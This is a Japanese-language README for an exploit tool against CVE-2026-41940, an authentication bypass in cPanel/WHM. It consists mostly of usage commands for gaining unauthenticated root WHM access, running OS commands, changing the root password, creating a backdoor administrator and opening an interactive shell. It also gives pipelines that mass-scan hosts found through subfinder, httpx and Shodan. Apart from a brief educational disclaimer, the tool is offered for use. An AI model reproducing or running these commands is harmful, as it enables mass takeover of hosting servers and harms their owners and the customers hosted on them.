
cPanel/WHM の CVE-2026-41940 認証バイパスを CRLF セッションインジェクションにより悪用し、認証不要のルートレベル WHM アクセスを取得します。その後、アカウントの一覧表示、OS コマンドの実行、および許可されたテスト用の対話型シェルの起動を行います。
⚠ このツールは教育目的またはバグバウンティ目的でのみ作成されています。管理された環境外での不正使用は固く禁止されています。
CVE-2026-41940 を悪用するためのツールです。これは cPanel & WHM における重大な認証バイパス(CVSS 10.0)で、認証されていない攻撃者が Authorization ヘッダーを介してサーバー側のセッションファイルに CRLF シーケンスを注入し、資格情報なしで root レベルの WHM アクセスを獲得できるものです。
CVE-2026-41940 は、一般的に、cPanel/WHM が認証セッションを処理する際の欠陥を突いて悪用されます。攻撃は通常、ログインインターフェースへの通常のリクエストから始まり、アプリケーションはユーザー資格情報を完全に検証する前にセッションを早期に初期化します。セッション関連の入力の不適切な処理により、特定の細工された、または予期しない入力構造が、サーバーによるセッションデータの保存方法や解釈方法を変更できるようになります。
| バージョン | 影響あり | 修正済み |
|---|---|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/lanicer/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
このツールには対象ドメインの指定が必要です。
単一ターゲットモード:
python cve.py -u https://target1.com:2083
target.txt ファイル(作成してください)からもスキャンできます:
python cve.py -l target.txt -t 50 -o result.json
利用可能なコマンド:
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
# List all accounts on the server
python cve.py list -u https://target.com:2087
# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087
# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# Interactive WHM shell
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# From scope list
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
実行が成功すると、対話型のWHMシェルを開くことができます:
python cve.py shell -u
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ このツールは教育目的またはバグバウンティ目的でのみ作成されています。管理された環境外での不正使用は固く禁止されています。
| コマンド | 説明 |
|---|
id | ユーザーIDを表示 |
hostname | サーバーのホスト名を取得 |
accounts | すべてのユーザーアカウントを一覧表示 |
info | 負荷、ディスク、MySQLホスト、バージョン |
cat <path> | ファイルの内容を読み取る |
exec <cmd> | OSコマンドを実行 |
newadmin <user> <pass> | バックドアWHM管理者を作成 |
passwd <pass> | rootパスワードを変更 |
l [path] | ディレクトリを一覧表示 |
help | すべてのコマンドを表示 |
exit | シェルモードを終了 |